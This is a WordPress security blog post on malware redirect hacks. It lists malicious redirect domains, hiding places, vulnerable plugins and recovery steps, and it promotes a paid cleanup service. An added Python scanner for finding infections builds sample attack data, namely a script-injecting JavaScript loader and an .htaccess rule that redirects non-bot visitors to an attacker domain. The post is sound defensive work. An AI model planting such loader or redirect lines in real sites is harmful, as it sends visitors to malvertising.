WordPress Redirect Hack
Many current WordPress hacks that I’m seeing are redirecting all visitors to a foreign domain. These “malware redirects” or “spam forwarding” are being used to send malvertising to all your website visitors.
This article looks at how this redirection occurs and what variations are possible. Because the redirects do not always occur on every visit (and are often deliberately hidden from admin users!), this type of hack may remain undetected for a long time.
One thing is certain: Remedial action must be taken urgently so that valuable traffic is not lost and your customers are not attacked.
Update: August 3, 2024. Balada Injector hackers are increasingly active again, and many websites are currently being attacked. A vulnerable LiteSpeed Cache plugin is often to blame; it needs to be deactivated (or updated to a patched version) and then all backdoors removed.
Update: August 18, 2023. There are still a lot of redirect attacks going on, mainly because of the same problems: insecure plugins and missing updates!
If you don’t want to waste any time, and want to protect your website visitors please contact me for immediate professional help & cleanup.
Common domain names actively used in WordPress redirects
egocoattell.live
redfiretobind.com
bluefiretobind.com
rdntocdns.com
taskscompletedlists.com
recordsbluemountain.com
roselinetoday.com
bluelitetoday.com
redselectorpage.com
blueselectorpage.com
greenstepcherry.com
bluestepcherry.com
decentralappps.com
linestoget.com
stratosbody.com
quartzquester.top
viqtorywins.com
clickandanalytics.com
predictivdisplay.com
firstblackphase.com
sortyellowapples.com
descriptionscripts.com
scriptsplatform.com
cdn.statisticline.com
desirebluestock.com
actraffic.com
importraffic.com
trackersline.com
violetlovelines.com
specialblueitems.com
weatherpillatform.com
admarketlocation.com
travelfornamewalking.ga
transandfiestas.ga
helpmart.ga
jQueryNS.com
legendarytable.com
greengoplatform.com
transportgoline.com
drakefollow.com
confirmacionsb.com
classicpartnerships.com
specialadves.com
lovegreenpencils.ga
linetoadsactive.com
secondaryinformtrand.com
donatelloflowfirstly.ga
hostingcloud.racing
lowerthenskyactive.ga
lowerbeforwarden.ml
polimer.xyz
deliverygoodstrategies.com
gabriellalovecats.com
watch-video.net
bnmjjwinf292.com
name0fbestway.com
declarebusinessgroup.ga
sinistermousemove.art
url-partners.g2afse.com
buyittraffic.com
cuttraffic.com
puttraffic.com
importtraffic.com
decimalprovehour5.live
trendopportunityfollow.ga
examhome.net
saskmade.net
stat.trackstatisticsss.com
sferverification.com
poponclick.info
train.developfirstline.com
letsmakeparty3.ga
beforwardplay.com
belaterbewasthere.com
waterflowpick24.live
2.8mono.biz
dontstopthismusics.com
lobbydesires.com
blackentertainments.com
fox.trackstatisticsss.com
graizoah.com
asoulrox.com
ofgogoatan.com
stivenfernando.com
fast.destinyfernandi.com
trackstatisticsss.com
check.resolutiondestin.com
dest.collectfasttracks.com
digestcolect.com
verybeatifulantony.com
gotosecond2.com
forwardmytraffic.com
crazytds.club
WordPress spam redirects – hiding places for the malware
In principle, automatic redirects can be placed in any file loaded by the WordPress system.
In addition, there are also frequent script injections directly into the database.
There are various hiding places for spam redirects that I’ve seen in recent months:
- JavaScript injections in PHP files (especially in theme and plugin files)
- JavaScript injected at the beginning of every JS file on the server
- Script injections in pages and posts (the post_content column of the wp_posts database table, assuming the default wp_ table prefix)
- The website URL (the siteurl and home rows in the wp_options database table) changed to the hacker’s domain
- Modified .htaccess files (often in many folders)
- Via advertising networks (hacked ad servers)
In addition to the spam redirects, multiple backdoors are always added, and often several admin users are added to WordPress to give the hackers full access even once the vulnerable plugins have been patched.
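To triage the file-system hiding places listed above, here is a small scanner. It is an added example, not code from the original article; it assumes the WordPress document root is on local disk and uses a short subset of the indicator domains from this page (swap in the full list). The three checks are: any file that mentions an indicator domain; an .htaccess whose Redirect/RewriteRule targets a host other than your own; and the heuristic that a mass "inject at the top of every JS file" attack leaves the same suspicious first line in many JS files. The sample site it builds is constructed test data, not a real compromised site. It does not touch the database, so the wp_posts and wp_options checks still have to be done with a query (or `wp option get siteurl` / `wp option get home` via WP-CLI).

```python
"""Triage scanner for WordPress redirect-hack hiding places (added example)."""
import os
import re
import tempfile

# Short subset of the indicator domains listed on this page (assumption: extend as needed).
IOC_DOMAINS = [
    "egocoattell.live", "redfiretobind.com", "bluefiretobind.com",
    "rdntocdns.com", "trackstatisticsss.com",
]

# Apache redirect directives whose target is an absolute URL; group 3 is the host.
HTACCESS_REDIRECT = re.compile(
    r"^\s*(RewriteRule|Redirect(Match|Permanent)?)\b.*https?://([^/\s]+)",
    re.IGNORECASE | re.MULTILINE,
)


def _read(path, limit=2_000_000):
    """Read up to `limit` bytes as text; binary junk is replaced, not raised."""
    with open(path, "rb") as fh:
        return fh.read(limit).decode("utf-8", errors="replace")


def scan_tree(root, iocs=IOC_DOMAINS, site_host=None):
    """Walk `root` and return a sorted list of (relative path, reason) findings."""
    findings = []
    js_first_lines = {}  # first line -> [paths]; used for the shared-injection heuristic
    ioc_res = [re.compile(re.escape(d), re.IGNORECASE) for d in iocs]
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            text = _read(path)
            # Check 1: indicator domain anywhere in the file (PHP, JS, .htaccess, ...).
            for pat, dom in zip(ioc_res, iocs):
                if pat.search(text):
                    findings.append((rel, "indicator domain " + dom))
                    break
            # Check 2: .htaccess redirecting to a host that is not the site itself.
            if name == ".htaccess":
                for m in HTACCESS_REDIRECT.finditer(text):
                    host = m.group(3)
                    if site_host is None or host.lower() != site_host.lower():
                        findings.append((rel, "redirect to external host " + host))
            # Collect first lines of JS files for check 3.
            if name.endswith(".js"):
                first = text.split("\n", 1)[0].strip()
                if first:
                    js_first_lines.setdefault(first, []).append(rel)
    # Check 3 (heuristic, review by hand): the same URL- or script-bearing first line
    # in three or more JS files is the footprint of a prepend-to-every-file injection.
    for line, paths in js_first_lines.items():
        low = line.lower()
        if len(paths) >= 3 and ("http" in low or "<script" in low or "eval(" in low):
            for rel in paths:
                findings.append((rel, "identical first line shared by %d JS files" % len(paths)))
    return sorted(set(findings))


def build_sample_site(base):
    """Create a constructed WordPress-like tree with an injected loader in three JS files
    and a redirecting .htaccess. Constructed test data, not from a real site."""
    loader = ("var _0x=document.createElement('script');"
              "_0x.src='https://rdntocdns.com/x.js';document.head.appendChild(_0x);\n")
    layout = {
        "wp-includes/js/a.js": loader + "function a(){}\n",
        "wp-includes/js/b.js": loader + "function b(){}\n",
        "wp-content/themes/t/s.js": loader + "function s(){}\n",
        "wp-content/themes/t/clean.js": "(function(){})();\n",
        ".htaccess": ("RewriteEngine On\nRewriteCond %{HTTP_USER_AGENT} !bot\n"
                      "RewriteRule ^(.*)$ http://egocoattell.live/ [R=302,L]\n"),
        "wp-content/plugins/p/p.php": "<?php\n// nothing suspicious here\n",
    }
    for rel, content in layout.items():
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)


def run_demo():
    """Build the sample site in a temp dir and scan it; returns the findings."""
    base = tempfile.mkdtemp(prefix="wp-scan-")
    build_sample_site(base)
    return scan_tree(base, site_host="example.com")


if __name__ == "__main__":
    for rel, reason in run_demo():
        print(rel, "->", reason)
```

Run it against a real document root with `scan_tree("/var/www/html", IOC_DOMAINS, site_host="yourdomain.com")`. Expect some noise from check 3 on legitimate vendored libraries that share a licence header with a URL; the point is to surface the candidates quickly, not to replace a clean reinstall.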
A partial list of vulnerable plugins being used
The vast majority of these attacks target vulnerabilities that were patched months or even years ago. If any of these plugins is installed on your website, make sure you are running the latest, patched version!
- Duplicator
- Page Builder by SiteOrigin
- ThemeGrill Demo Importer
- Profile Builder
- WP GDPR Compliance
- Coming Soon and Maintenance Mode
How do I avoid these problems?
As with most WordPress attacks, the solution is to update all your plugins and WordPress core regularly. Also make sure to remove (and not just deactivate) any plugins that are not required.
How to restore your website if you are infected
There are two ways to restore an infected website: by restoring a recent, clean backup or by removing all malware and backdoors that otherwise allow hackers to keep coming back.
- Restore a backup
Since these attacks generally infect hundreds or even thousands of files as well as the database, the best recovery method is to delete the entire WordPress directory (make sure your backup is complete and clean before doing this!) and reinstall from a clean backup. Then restore your database from a clean backup as well.
- Manually remove all malware and backdoors
If this is not possible, you should contact a professional for help: with the right tools and knowledge the cleanup can be completed in 2-3 hours and your website can be put back online.
I can have your website clean, safe and online within hours for just US$149 (€129) – contact me now for immediate help!